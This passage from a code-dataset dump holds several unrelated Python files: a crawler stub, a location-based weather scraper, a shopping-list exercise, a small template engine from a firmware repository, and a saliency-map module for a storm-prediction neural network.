------------------\r\n","repo_name":"git-aditya-pratap-singh/Data-Structure-with-Python","sub_path":"Tree/Level-Order-Traversal.py","file_name":"Level-Order-Traversal.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"22"} +{"seq_id":"39178126027","text":"#coding:utf-8\n\n# 3种抓取网页数据的方法: re, BeautifulSoup,lxml\n\n\n# 链接爬虫添加缓存支持\n\nclass Downloader(object):\n\t\"\"\"docstring for Downloader\"\"\"\n\tdef __init__(self, delay=5,\n\t\tuser_agent=\"wswp\",proxies=None,\n\t\tnumRetries=1,cache=None):\n\n\t\tsuper(Downloader, self).__init__()\n\t\tself.throttle = Throttle(delay)\n\t\tself.user_agent = user_agent\n\t\tself.proxies = proxies\n\t\tself.numRetries = numRetries\n\t\tself.cache = cache\n\n\tdef __call__(self):\n\t\tresult = None\n\t\tif self.cache:\n\t\t\ttry:\n\t\t\t\tresult = self.cache[url]\n\t\t\texcept KeyError as e:\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\tif self.numRetries >0 and 500<= result['code'] <600:\n\t\t\t\t\tresult = None\n\n\t\tif result is 
None:\n\t\t\tself.throttle.wait(url)\n\n\n\t\t","repo_name":"wudibbs-gcl/crawling","sub_path":"test4.py","file_name":"test4.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"25536807937","text":"import requests\nimport json\nfrom bs4 import BeautifulSoup\n\nsend_url = \"http://api.ipstack.com/check?access_key={<key>}\"\ngeo_req = requests.get(send_url)\ngeo_json = json.loads(geo_req.text)\ncity = geo_json['city']\n\nprint(city)\n\n# creating url and requests instance\nurl = \"https://www.google.com/search?hl=en&q=\"+\"weather\"+city+\"&oq=\"+\"weather\"+city\nhtml = requests.get(url).content\n \n# getting raw data\nsoup = BeautifulSoup(html, 'html.parser')\ntemp = soup.find('div', attrs={'class': 'BNeawe iBp4i AP7Wnd'}).text\nstr = soup.find('div', attrs={'class': 'BNeawe tAd8D AP7Wnd'}).text\n \n# formatting data\ndata = str.split('\\n')\ntime = data[0]\nsky = data[1]\n \n# getting all div tag\nlistdiv = soup.findAll('div', attrs={'class': 'BNeawe s3v9rd AP7Wnd'})\nstrd = listdiv[5].text\n \n# getting other required data\npos = strd.find('Wind')\nother_data = strd[pos:]\n \n# printing all data\nprint(\"Temperature is\", temp)\nprint(\"Time: \", time)\nprint(\"Sky Description: \", sky)","repo_name":"NishantNepal1/musicRecommendationusingMetadata","sub_path":"spotifyScraper/weatherTime.py","file_name":"weatherTime.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"11080737177","text":"\"\"\"\nShopping List Calculator I\n\"\"\"\n\n# Create five variables,\n# set them to strings that represent 5 common shopping list items\n\n\nitem_name_1 = \"almond milk\"\nitem_name_2 = \"coffee\"\nitem_name_3 = \"bananas\"\nitem_name_4 = \"oatmeal\"\nitem_name_5 = \"eggs\"\n\n# Create five more variables,\n# set them to floats that represent the prices of each of the items above\n\nitem_price_1 = 3.50\nitem_price_2 = 9.00\nitem_price_3 = 2.50\nitem_price_4 = 4.00\nitem_price_5 = 2.50\n\n# Create five more variables,\n# set them to ints that represent the quantity of each of the items above\nitem_quant_1 = 1\nitem_quant_2 = 1\nitem_quant_3 = 6\nitem_quant_4 = 1\nitem_quant_5 = 12\n\n# Print to the console the name and price of each item defined above as follows:\n# 1 Coco Puffs = $8.95.\n# where:\n# 1 would be item_quant_1\n# Coco Puffs would be item_name_1\n# 8.95 would be item_name_2\n\nprint(f\"{item_quant_1} {item_name_1} is ${item_price_1}.\")\nprint(f\"{item_quant_2} {item_name_2} is ${item_price_2}.\")\nprint(f\"{item_quant_3} {item_name_3} is ${item_price_3}.\")\nprint(f\"{item_quant_4} {item_name_4} is ${item_price_4}.\")\nprint(f\"{item_quant_5} {item_name_5} is ${item_price_5}.\")\n","repo_name":"melissaarliss/python-course","sub_path":"hw/hw-1/pset_basic_data_types/shopping_list/p1.py","file_name":"p1.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"7016510409","text":"from enum import Enum\n\nimport sys\nimport os\n\n\nclass TempliteCompiler:\n class State(Enum):\n TEXT = 1\n CONTROL = 2\n VARIABLE = 3\n\n def __init__(self, source: str, encoding: str):\n self.blocks = [f\"# -*- coding: {encoding} -*-\"]\n self.block = \"\"\n self.source = source\n self.cursor = 0\n self.offset = 0\n\n def processText(self):\n self.block = self.block.replace(\"\\\\\", \"\\\\\\\\\").replace('\"', 
'\\\\\"')\n self.block = \"\\t\" * self.offset + f'write(\"\"\"{self.block}\"\"\")'\n self.blocks.append(self.block)\n self.block = \"\"\n\n def getLine(self):\n return self.source[: self.cursor].count(\"\\n\") + 1\n\n def controlIsEnding(self):\n block_stripped = self.block.lstrip()\n if block_stripped.startswith(\":\"):\n if not self.offset:\n raise SyntaxError(\n f\"Line: {self.getLine()}, no statement to terminate: `{block_stripped}`\"\n )\n self.offset -= 1\n self.block = block_stripped[1:]\n if not self.block.endswith(\":\"):\n return True\n return False\n\n def processControl(self):\n self.block = self.block.rstrip()\n\n if self.controlIsEnding():\n self.block = \"\"\n return\n\n lines = self.block.splitlines()\n margin = min(len(line) - len(line.lstrip()) for line in lines if line.strip())\n self.block = \"\\n\".join(\"\\t\" * self.offset + line[margin:] for line in lines)\n self.blocks.append(self.block)\n if self.block.endswith(\":\"):\n self.offset += 1\n self.block = \"\"\n\n def processVariable(self):\n self.block = self.block.strip()\n self.block = \"\\t\" * self.offset + f\"write({self.block})\"\n self.blocks.append(self.block)\n self.block = \"\"\n\n def compile(self):\n state = self.State.TEXT\n\n # Process template source\n while self.cursor < len(self.source):\n # Process plain text till first token occurance\n if state == self.State.TEXT:\n if self.source[self.cursor :].startswith(\"{%\"):\n state = self.State.CONTROL\n self.cursor += 1\n elif self.source[self.cursor :].startswith(\"{{\"):\n state = self.State.VARIABLE\n self.cursor += 1\n else:\n self.block += self.source[self.cursor]\n # Commit self.block if token was found\n if state != self.State.TEXT:\n self.processText()\n elif state == self.State.CONTROL:\n if self.source[self.cursor :].startswith(\"%}\"):\n self.cursor += 1\n state = self.State.TEXT\n self.processControl()\n else:\n self.block += self.source[self.cursor]\n elif state == self.State.VARIABLE:\n if self.source[self.cursor :].startswith(\"}}\"):\n self.cursor += 1\n state = self.State.TEXT\n self.processVariable()\n else:\n self.block += self.source[self.cursor]\n else:\n raise Exception(\"Unknown State\")\n\n self.cursor += 1\n\n if state != self.State.TEXT:\n raise Exception(\"Last self.block was not closed\")\n\n if self.block:\n self.processText()\n\n return \"\\n\".join(self.blocks)\n\n\nclass Templite:\n cache = {}\n\n def __init__(self, text=None, filename=None, encoding=\"utf-8\", caching=False):\n \"\"\"Loads a template from string or file.\"\"\"\n if filename:\n filename = os.path.abspath(filename)\n mtime = os.path.getmtime(filename)\n self.file = key = filename\n elif text is not None:\n self.file = mtime = None\n key = hash(text)\n else:\n raise ValueError(\"either text or filename required\")\n # set attributes\n self.encoding = encoding\n self.caching = caching\n # check cache\n cache = self.cache\n if caching and key in cache and cache[key][0] == mtime:\n self._code = cache[key][1]\n return\n # read file\n if filename:\n with open(filename) as fh:\n text = fh.read()\n # Compile template to executable\n code = TempliteCompiler(text, self.encoding).compile()\n self._code = compile(code, self.file or \"<string>\", \"exec\")\n # Cache for future use\n if caching:\n cache[key] = (mtime, self._code)\n\n def render(self, **namespace):\n \"\"\"Renders the template according to the given namespace.\"\"\"\n stack = []\n namespace[\"__file__\"] = self.file\n\n # add write method\n def write(*args):\n for value in args:\n 
stack.append(str(value))\n\n namespace[\"write\"] = write\n\n # add include method\n def include(file):\n if not os.path.isabs(file):\n if self.file:\n base = os.path.dirname(self.file)\n else:\n base = os.path.dirname(sys.argv[0])\n file = os.path.join(base, file)\n # note: Templite.__init__ takes (text, filename, encoding, caching); the original\n # call also passed a nonexistent self.delimiters, which raised AttributeError\n t = Templite(None, file, self.encoding, self.caching)\n stack.append(t.render(**namespace))\n\n namespace[\"include\"] = include\n # execute template code\n exec(self._code, namespace)\n return \"\".join(stack)\n","repo_name":"DarkFlippers/unleashed-firmware","sub_path":"scripts/flipper/utils/templite.py","file_name":"templite.py","file_ext":"py","file_size_in_byte":5565,"program_lang":"python","lang":"en","doc_type":"code","stars":12119,"dataset":"github-code","pt":"22"} +{"seq_id":"72348213496","text":"\"\"\"Methods for creating saliency maps.\"\"\"\n\nimport pickle\nimport numpy\nfrom keras import backend as K\nfrom gewittergefahr.gg_utils import file_system_utils\nfrom gewittergefahr.gg_utils import error_checking\nfrom gewittergefahr.deep_learning import model_interpretation\n\nTOLERANCE = 1e-6\nDEFAULT_IDEAL_ACTIVATION = 2.\n\nPREDICTOR_MATRICES_KEY = model_interpretation.PREDICTOR_MATRICES_KEY\nSALIENCY_MATRICES_KEY = 'saliency_matrices'\nMODEL_FILE_KEY = model_interpretation.MODEL_FILE_KEY\nFULL_STORM_IDS_KEY = model_interpretation.FULL_STORM_IDS_KEY\nSTORM_TIMES_KEY = model_interpretation.STORM_TIMES_KEY\nCOMPONENT_TYPE_KEY = 'component_type_string'\nTARGET_CLASS_KEY = 'target_class'\nLAYER_NAME_KEY = 'layer_name'\nIDEAL_ACTIVATION_KEY = 'ideal_activation'\nNEURON_INDICES_KEY = 'neuron_indices'\nCHANNEL_INDEX_KEY = 'channel_index'\nSOUNDING_PRESSURES_KEY = model_interpretation.SOUNDING_PRESSURES_KEY\n\nSTANDARD_FILE_KEYS = [\n PREDICTOR_MATRICES_KEY, SALIENCY_MATRICES_KEY,\n FULL_STORM_IDS_KEY, STORM_TIMES_KEY, MODEL_FILE_KEY,\n COMPONENT_TYPE_KEY, TARGET_CLASS_KEY, LAYER_NAME_KEY, IDEAL_ACTIVATION_KEY,\n NEURON_INDICES_KEY, CHANNEL_INDEX_KEY,\n SOUNDING_PRESSURES_KEY\n]\n\nMEAN_PREDICTOR_MATRICES_KEY = model_interpretation.MEAN_PREDICTOR_MATRICES_KEY\nMEAN_SALIENCY_MATRICES_KEY = 'mean_saliency_matrices'\nNON_PMM_FILE_KEY = model_interpretation.NON_PMM_FILE_KEY\nPMM_MAX_PERCENTILE_KEY = model_interpretation.PMM_MAX_PERCENTILE_KEY\nMEAN_SOUNDING_PRESSURES_KEY = model_interpretation.MEAN_SOUNDING_PRESSURES_KEY\n\nPMM_FILE_KEYS = [\n MEAN_PREDICTOR_MATRICES_KEY, MEAN_SALIENCY_MATRICES_KEY, MODEL_FILE_KEY,\n NON_PMM_FILE_KEY, PMM_MAX_PERCENTILE_KEY, MEAN_SOUNDING_PRESSURES_KEY\n]\n\n\ndef _check_in_and_out_matrices(\n predictor_matrices, num_examples=None, saliency_matrices=None):\n \"\"\"Error-checks input and output matrices.\n\n T = number of input tensors to the model\n E = number of examples (storm objects)\n\n :param predictor_matrices: length-T list of predictor matrices. Each item\n must be a numpy array.\n :param num_examples: E in the above discussion. The first axis of each\n array must have length E. 
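To make the shape contract in this docstring concrete, here is a toy pair of matrix lists that would satisfy the checks below; the dimensions (two input tensors for E = 8 storm objects) are illustrative, not taken from the source:

import numpy as np

predictor_matrices = [
    np.zeros((8, 32, 32, 4)),   # e.g. radar images: E x rows x columns x fields
    np.zeros((8, 49, 5)),       # e.g. soundings: E x heights x fields
]
saliency_matrices = [np.zeros_like(m) for m in predictor_matrices]
assert all(m.shape[0] == 8 for m in predictor_matrices + saliency_matrices)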
If you don't know the number of examples,\n leave this as None.\n :param saliency_matrices: Same as `predictor_matrices` but with saliency\n values.\n :raises: ValueError: if `predictor_matrices` and `saliency_matrices` have\n different lengths.\n \"\"\"\n\n error_checking.assert_is_list(predictor_matrices)\n num_matrices = len(predictor_matrices)\n\n if saliency_matrices is None:\n saliency_matrices = [None] * num_matrices\n\n error_checking.assert_is_list(saliency_matrices)\n num_saliency_matrices = len(saliency_matrices)\n\n if num_matrices != num_saliency_matrices:\n error_string = (\n 'Number of predictor matrices ({0:d}) should = number of saliency '\n 'matrices ({1:d}).'\n ).format(num_matrices, num_saliency_matrices)\n\n raise ValueError(error_string)\n\n for i in range(num_matrices):\n error_checking.assert_is_numpy_array_without_nan(predictor_matrices[i])\n\n if num_examples is not None:\n these_expected_dim = numpy.array(\n (num_examples,) + predictor_matrices[i].shape[1:], dtype=int\n )\n error_checking.assert_is_numpy_array(\n predictor_matrices[i], exact_dimensions=these_expected_dim\n )\n\n if saliency_matrices[i] is not None:\n error_checking.assert_is_numpy_array_without_nan(\n saliency_matrices[i]\n )\n\n these_expected_dim = numpy.array(\n predictor_matrices[i].shape, dtype=int\n )\n error_checking.assert_is_numpy_array(\n saliency_matrices[i], exact_dimensions=these_expected_dim\n )\n\n\ndef check_metadata(\n component_type_string, target_class=None, layer_name=None,\n ideal_activation=None, neuron_indices=None, channel_index=None):\n \"\"\"Error-checks metadata for saliency calculations.\n\n :param component_type_string: Component type (must be accepted by\n `model_interpretation.check_component_type`).\n :param target_class: See doc for `get_saliency_maps_for_class_activation`.\n :param layer_name: See doc for `get_saliency_maps_for_neuron_activation` or\n `get_saliency_maps_for_channel_activation`.\n :param ideal_activation: Same.\n :param neuron_indices: See doc for\n `get_saliency_maps_for_neuron_activation`.\n :param channel_index: See doc for `get_saliency_maps_for_class_activation`.\n\n :return: metadata_dict: Dictionary with the following keys.\n metadata_dict['component_type_string']: See input doc.\n metadata_dict['target_class']: Same.\n metadata_dict['layer_name']: Same.\n metadata_dict['ideal_activation']: Same.\n metadata_dict['neuron_indices']: Same.\n metadata_dict['channel_index']: Same.\n \"\"\"\n\n model_interpretation.check_component_type(component_type_string)\n\n if (component_type_string ==\n model_interpretation.CLASS_COMPONENT_TYPE_STRING):\n error_checking.assert_is_integer(target_class)\n error_checking.assert_is_geq(target_class, 0)\n\n if component_type_string in [\n model_interpretation.NEURON_COMPONENT_TYPE_STRING,\n model_interpretation.CHANNEL_COMPONENT_TYPE_STRING\n ]:\n error_checking.assert_is_string(layer_name)\n if ideal_activation is not None:\n error_checking.assert_is_greater(ideal_activation, 0.)\n\n if (component_type_string ==\n model_interpretation.NEURON_COMPONENT_TYPE_STRING):\n error_checking.assert_is_integer_numpy_array(neuron_indices)\n error_checking.assert_is_geq_numpy_array(neuron_indices, 0)\n error_checking.assert_is_numpy_array(neuron_indices, num_dimensions=1)\n\n if (component_type_string ==\n model_interpretation.CHANNEL_COMPONENT_TYPE_STRING):\n error_checking.assert_is_integer(channel_index)\n error_checking.assert_is_geq(channel_index, 0)\n\n return {\n COMPONENT_TYPE_KEY: component_type_string,\n 
TARGET_CLASS_KEY: target_class,\n LAYER_NAME_KEY: layer_name,\n IDEAL_ACTIVATION_KEY: ideal_activation,\n NEURON_INDICES_KEY: neuron_indices,\n CHANNEL_INDEX_KEY: channel_index\n }\n\n\ndef do_saliency_calculations(\n model_object, loss_tensor, list_of_input_matrices):\n \"\"\"Does saliency calculations.\n\n T = number of input tensors to the model\n E = number of examples (storm objects)\n\n :param model_object: Instance of `keras.models.Model`.\n :param loss_tensor: Keras tensor defining the loss function.\n :param list_of_input_matrices: length-T list of numpy arrays, comprising one\n or more examples (storm objects). list_of_input_matrices[i] must have\n the same dimensions as the [i]th input tensor to the model.\n :return: list_of_saliency_matrices: length-T list of numpy arrays,\n comprising the saliency map for each example.\n list_of_saliency_matrices[i] has the same dimensions as\n list_of_input_matrices[i] and defines the \"saliency\" of each value x,\n which is the gradient of the loss function with respect to x.\n \"\"\"\n\n if isinstance(model_object.input, list):\n list_of_input_tensors = model_object.input\n else:\n list_of_input_tensors = [model_object.input]\n\n list_of_gradient_tensors = K.gradients(loss_tensor, list_of_input_tensors)\n num_input_tensors = len(list_of_input_tensors)\n\n for i in range(num_input_tensors):\n list_of_gradient_tensors[i] /= K.maximum(\n K.std(list_of_gradient_tensors[i]), K.epsilon()\n )\n\n inputs_to_gradients_function = K.function(\n list_of_input_tensors + [K.learning_phase()], list_of_gradient_tensors\n )\n\n # list_of_saliency_matrices = None\n # num_examples = list_of_input_matrices[0].shape[0]\n #\n # for i in range(num_examples):\n # these_input_matrices = [a[[i], ...] for a in list_of_input_matrices]\n # these_saliency_matrices = inputs_to_gradients_function(\n # these_input_matrices + [0])\n #\n # if list_of_saliency_matrices is None:\n # list_of_saliency_matrices = these_saliency_matrices + []\n # else:\n # for i in range(num_input_tensors):\n # list_of_saliency_matrices[i] = numpy.concatenate(\n # (list_of_saliency_matrices[i], these_saliency_matrices[i]),\n # axis=0)\n\n list_of_saliency_matrices = inputs_to_gradients_function(\n list_of_input_matrices + [0]\n )\n\n for i in range(num_input_tensors):\n list_of_saliency_matrices[i] *= -1\n\n return list_of_saliency_matrices\n\n\ndef get_saliency_maps_for_class_activation(\n model_object, target_class, list_of_input_matrices):\n \"\"\"For each input example, creates saliency map for prob of target class.\n\n :param model_object: Instance of `keras.models.Model`.\n :param target_class: Saliency maps will be created for this class. 
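As a one-line arithmetic illustration of the class-activation loss this function builds (mean squared difference between the target class's probability and 1), with made-up probabilities:

import numpy as np

probs = np.array([0.2, 0.7, 0.1])   # illustrative class probabilities for one example
target_class = 1
loss = np.mean((probs[target_class] - 1.) ** 2)
print(loss)   # ~0.09; saliency is the sign-flipped gradient of this loss w.r.t. the inputs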
Must be\n an integer in 0...(K - 1), where K = number of classes.\n :param list_of_input_matrices: See doc for `do_saliency_calculations`.\n :return: list_of_saliency_matrices: See doc for `do_saliency_calculations`.\n \"\"\"\n\n check_metadata(\n component_type_string=model_interpretation.CLASS_COMPONENT_TYPE_STRING,\n target_class=target_class)\n\n num_output_neurons = model_object.layers[-1].output.get_shape().as_list()[\n -1]\n\n if num_output_neurons == 1:\n error_checking.assert_is_leq(target_class, 1)\n if target_class == 1:\n loss_tensor = K.mean(\n (model_object.layers[-1].output[..., 0] - 1) ** 2\n )\n else:\n loss_tensor = K.mean(model_object.layers[-1].output[..., 0] ** 2)\n else:\n error_checking.assert_is_less_than(target_class, num_output_neurons)\n loss_tensor = K.mean(\n (model_object.layers[-1].output[..., target_class] - 1) ** 2\n )\n\n return do_saliency_calculations(\n model_object=model_object, loss_tensor=loss_tensor,\n list_of_input_matrices=list_of_input_matrices)\n\n\ndef get_saliency_maps_for_neuron_activation(\n model_object, layer_name, neuron_indices, list_of_input_matrices,\n ideal_activation=DEFAULT_IDEAL_ACTIVATION):\n \"\"\"For each input example, creates saliency map for activatn of one neuron.\n\n :param model_object: Instance of `keras.models.Model`.\n :param layer_name: Name of layer containing the relevant neuron.\n :param neuron_indices: 1-D numpy array with indices of the relevant neuron.\n Must have length K - 1, where K = number of dimensions in layer output.\n The first dimension of the layer output is the example dimension, for\n which the index in this case is always 0.\n :param list_of_input_matrices: See doc for `do_saliency_calculations`.\n :param ideal_activation: The loss function will be\n (neuron_activation - ideal_activation)** 2. If\n `ideal_activation is None`, the loss function will be\n -sign(neuron_activation) * neuron_activation**2, or the negative signed\n square of neuron_activation, so that loss always decreases as\n neuron_activation increases.\n :return: list_of_saliency_matrices: See doc for `do_saliency_calculations`.\n \"\"\"\n\n check_metadata(\n component_type_string=model_interpretation.NEURON_COMPONENT_TYPE_STRING,\n layer_name=layer_name, ideal_activation=ideal_activation,\n neuron_indices=neuron_indices)\n\n if ideal_activation is None:\n loss_tensor = (\n -K.sign(\n model_object.get_layer(name=layer_name).output[\n 0, ..., neuron_indices\n ]\n )\n * model_object.get_layer(name=layer_name).output[\n 0, ..., neuron_indices\n ] ** 2\n )\n else:\n loss_tensor = (\n model_object.get_layer(name=layer_name).output[\n 0, ..., neuron_indices\n ]\n - ideal_activation\n ) ** 2\n\n return do_saliency_calculations(\n model_object=model_object, loss_tensor=loss_tensor,\n list_of_input_matrices=list_of_input_matrices)\n\n\ndef get_saliency_maps_for_channel_activation(\n model_object, layer_name, channel_index, list_of_input_matrices,\n stat_function_for_neuron_activations,\n ideal_activation=DEFAULT_IDEAL_ACTIVATION):\n \"\"\"For each input example, creates saliency map for activatn of one channel.\n\n :param model_object: Instance of `keras.models.Model`.\n :param layer_name: Name of layer containing the relevant channel.\n :param channel_index: Index of the relevant channel. 
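A tiny numeric illustration of the two neuron-activation losses defined in get_saliency_maps_for_neuron_activation above: with an ideal_activation the loss is a squared distance, without one it is the negative signed square (so the loss always falls as the activation rises); the activation value is invented:

activation = 1.2
ideal_activation = 2.

loss_with_target = (activation - ideal_activation) ** 2              # 0.64
loss_without_target = -(1 if activation > 0 else -1) * activation ** 2   # -1.44
print(loss_with_target, loss_without_target)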
This method creates\n saliency maps for the [j]th output channel of `layer_name`, where\n j = `channel_index`.\n :param list_of_input_matrices: See doc for `do_saliency_calculations`.\n :param stat_function_for_neuron_activations: Function used to process neuron\n activations. In general, a channel contains many neurons, so there is\n an infinite number of ways to maximize the \"channel activation,\" because\n there is an infinite number of ways to define \"channel activation\".\n This function must take a Keras tensor (containing neuron activations)\n and return a single number. Some examples are `keras.backend.max` and\n `keras.backend.mean`.\n :param ideal_activation: See doc for\n `get_saliency_maps_for_neuron_activation`.\n :return: list_of_saliency_matrices: See doc for `do_saliency_calculations`.\n \"\"\"\n\n check_metadata(\n component_type_string=\n model_interpretation.CHANNEL_COMPONENT_TYPE_STRING,\n layer_name=layer_name, ideal_activation=ideal_activation,\n channel_index=channel_index\n )\n\n if ideal_activation is None:\n loss_tensor = -K.abs(stat_function_for_neuron_activations(\n model_object.get_layer(name=layer_name).output[\n 0, ..., channel_index\n ]\n ))\n else:\n error_checking.assert_is_greater(ideal_activation, 0.)\n loss_tensor = K.abs(\n stat_function_for_neuron_activations(\n model_object.get_layer(name=layer_name).output[\n 0, ..., channel_index]\n )\n - ideal_activation\n )\n\n return do_saliency_calculations(\n model_object=model_object, loss_tensor=loss_tensor,\n list_of_input_matrices=list_of_input_matrices)\n\n\ndef write_standard_file(\n pickle_file_name, denorm_predictor_matrices, saliency_matrices,\n full_storm_id_strings, storm_times_unix_sec, model_file_name,\n metadata_dict, sounding_pressure_matrix_pa=None):\n \"\"\"Writes saliency maps (one per storm object) to Pickle file.\n\n E = number of examples (storm objects)\n H = number of sounding heights\n\n :param pickle_file_name: Path to output file.\n :param denorm_predictor_matrices: See doc for `_check_in_and_out_matrices`.\n :param saliency_matrices: Same.\n :param full_storm_id_strings: length-E list of storm IDs.\n :param storm_times_unix_sec: length-E numpy array of storm times.\n :param model_file_name: Path to model that created saliency maps (readable\n by `cnn.read_model`).\n :param metadata_dict: Dictionary created by `check_metadata`.\n :param sounding_pressure_matrix_pa: E-by-H numpy array of pressure\n levels. 
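# The "stat function" above collapses a channel's many neuron activations
# into one number; a toy numpy illustration of the two examples the
# docstring names (keras.backend.max / keras.backend.mean equivalents):
import numpy as np

channel = np.array([[0.1, 0.9], [0.4, 0.2]])  # one channel's activations
print(np.max(channel))   # 0.9  -> loss rewards the single strongest neuron
print(np.mean(channel))  # 0.4  -> loss rewards the channel on average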
Needed only if the model is trained with soundings but without\n pressure as a predictor.\n \"\"\"\n\n error_checking.assert_is_string(model_file_name)\n error_checking.assert_is_string_list(full_storm_id_strings)\n error_checking.assert_is_numpy_array(\n numpy.array(full_storm_id_strings), num_dimensions=1\n )\n\n num_examples = len(full_storm_id_strings)\n these_expected_dim = numpy.array([num_examples], dtype=int)\n\n error_checking.assert_is_integer_numpy_array(storm_times_unix_sec)\n error_checking.assert_is_numpy_array(\n storm_times_unix_sec, exact_dimensions=these_expected_dim)\n\n _check_in_and_out_matrices(\n predictor_matrices=denorm_predictor_matrices, num_examples=num_examples,\n saliency_matrices=saliency_matrices)\n\n if sounding_pressure_matrix_pa is not None:\n error_checking.assert_is_numpy_array_without_nan(\n sounding_pressure_matrix_pa)\n error_checking.assert_is_greater_numpy_array(\n sounding_pressure_matrix_pa, 0.)\n error_checking.assert_is_numpy_array(\n sounding_pressure_matrix_pa, num_dimensions=2)\n\n these_expected_dim = numpy.array(\n (num_examples,) + sounding_pressure_matrix_pa.shape[1:],\n dtype=int\n )\n error_checking.assert_is_numpy_array(\n sounding_pressure_matrix_pa, exact_dimensions=these_expected_dim)\n\n saliency_dict = {\n PREDICTOR_MATRICES_KEY: denorm_predictor_matrices,\n SALIENCY_MATRICES_KEY: saliency_matrices,\n FULL_STORM_IDS_KEY: full_storm_id_strings,\n STORM_TIMES_KEY: storm_times_unix_sec,\n MODEL_FILE_KEY: model_file_name,\n COMPONENT_TYPE_KEY: metadata_dict[COMPONENT_TYPE_KEY],\n TARGET_CLASS_KEY: metadata_dict[TARGET_CLASS_KEY],\n LAYER_NAME_KEY: metadata_dict[LAYER_NAME_KEY],\n IDEAL_ACTIVATION_KEY: metadata_dict[IDEAL_ACTIVATION_KEY],\n NEURON_INDICES_KEY: metadata_dict[NEURON_INDICES_KEY],\n CHANNEL_INDEX_KEY: metadata_dict[CHANNEL_INDEX_KEY],\n SOUNDING_PRESSURES_KEY: sounding_pressure_matrix_pa\n }\n\n file_system_utils.mkdir_recursive_if_necessary(file_name=pickle_file_name)\n pickle_file_handle = open(pickle_file_name, 'wb')\n pickle.dump(saliency_dict, pickle_file_handle)\n pickle_file_handle.close()\n\n\ndef write_pmm_file(\n pickle_file_name, mean_denorm_predictor_matrices,\n mean_saliency_matrices, model_file_name, non_pmm_file_name,\n pmm_max_percentile_level, mean_sounding_pressures_pa=None):\n \"\"\"Writes composite saliency map to Pickle file.\n\n The composite should be created by probability-matched means (PMM).\n\n H = number of sounding heights\n\n :param pickle_file_name: Path to output file.\n :param mean_denorm_predictor_matrices: See doc for\n `_check_in_and_out_matrices`.\n :param mean_saliency_matrices: Same.\n :param model_file_name: Path to model that created saliency maps (readable\n by `cnn.read_model`).\n :param non_pmm_file_name: Path to standard saliency file (containing\n non-composited saliency maps).\n :param pmm_max_percentile_level: Max percentile level for PMM.\n :param mean_sounding_pressures_pa: length-H numpy array of PMM-composited\n sounding pressures. 
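# write_standard_file opens, dumps, and closes the Pickle handle by hand;
# a minimal sketch of the same write pattern with a context manager, with
# os.makedirs standing in for mkdir_recursive_if_necessary (the payload
# and path here are placeholders):
import os
import pickle

def write_pickle(file_name, payload):
    os.makedirs(os.path.dirname(file_name) or '.', exist_ok=True)
    with open(file_name, 'wb') as handle:  # closed even if dump() raises
        pickle.dump(payload, handle)

write_pickle('/tmp/saliency_demo/demo.p', {'saliency_matrices': []})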
Needed only if the model is trained with soundings\n but without pressure as a predictor.\n \"\"\"\n\n error_checking.assert_is_string(model_file_name)\n error_checking.assert_is_string(non_pmm_file_name)\n error_checking.assert_is_geq(pmm_max_percentile_level, 90.)\n error_checking.assert_is_leq(pmm_max_percentile_level, 100.)\n\n _check_in_and_out_matrices(\n predictor_matrices=mean_denorm_predictor_matrices, num_examples=None,\n saliency_matrices=mean_saliency_matrices)\n\n if mean_sounding_pressures_pa is not None:\n num_heights = mean_denorm_predictor_matrices[-1].shape[-2]\n these_expected_dim = numpy.array([num_heights], dtype=int)\n\n error_checking.assert_is_geq_numpy_array(mean_sounding_pressures_pa, 0.)\n error_checking.assert_is_numpy_array(\n mean_sounding_pressures_pa, exact_dimensions=these_expected_dim)\n\n mean_saliency_dict = {\n MEAN_PREDICTOR_MATRICES_KEY: mean_denorm_predictor_matrices,\n MEAN_SALIENCY_MATRICES_KEY: mean_saliency_matrices,\n MODEL_FILE_KEY: model_file_name,\n NON_PMM_FILE_KEY: non_pmm_file_name,\n PMM_MAX_PERCENTILE_KEY: pmm_max_percentile_level,\n MEAN_SOUNDING_PRESSURES_KEY: mean_sounding_pressures_pa\n }\n\n file_system_utils.mkdir_recursive_if_necessary(file_name=pickle_file_name)\n pickle_file_handle = open(pickle_file_name, 'wb')\n pickle.dump(mean_saliency_dict, pickle_file_handle)\n pickle_file_handle.close()\n\n\ndef read_file(pickle_file_name):\n \"\"\"Reads composite or non-composite saliency maps from Pickle file.\n\n :param pickle_file_name: Path to input file (created by\n `write_standard_file` or `write_pmm_file`).\n :return: saliency_dict: Has the following keys if not a composite...\n saliency_dict['denorm_predictor_matrices']: See doc for\n `write_standard_file`.\n saliency_dict['saliency_matrices']: Same.\n saliency_dict['full_storm_id_strings']: Same.\n saliency_dict['storm_times_unix_sec']: Same.\n saliency_dict['model_file_name']: Same.\n saliency_dict['component_type_string']: Same.\n saliency_dict['target_class']: Same.\n saliency_dict['layer_name']: Same.\n saliency_dict['ideal_activation']: Same.\n saliency_dict['neuron_indices']: Same.\n saliency_dict['channel_index']: Same.\n saliency_dict['sounding_pressure_matrix_pa']: Same.\n\n ...or the following keys if composite...\n\n saliency_dict['mean_denorm_predictor_matrices']: See doc for\n `write_pmm_file`.\n saliency_dict['mean_saliency_matrices']: Same.\n saliency_dict['model_file_name']: Same.\n saliency_dict['non_pmm_file_name']: Same.\n saliency_dict['pmm_max_percentile_level']: Same.\n saliency_dict['mean_sounding_pressures_pa']: Same.\n\n :return: pmm_flag: Boolean flag. 
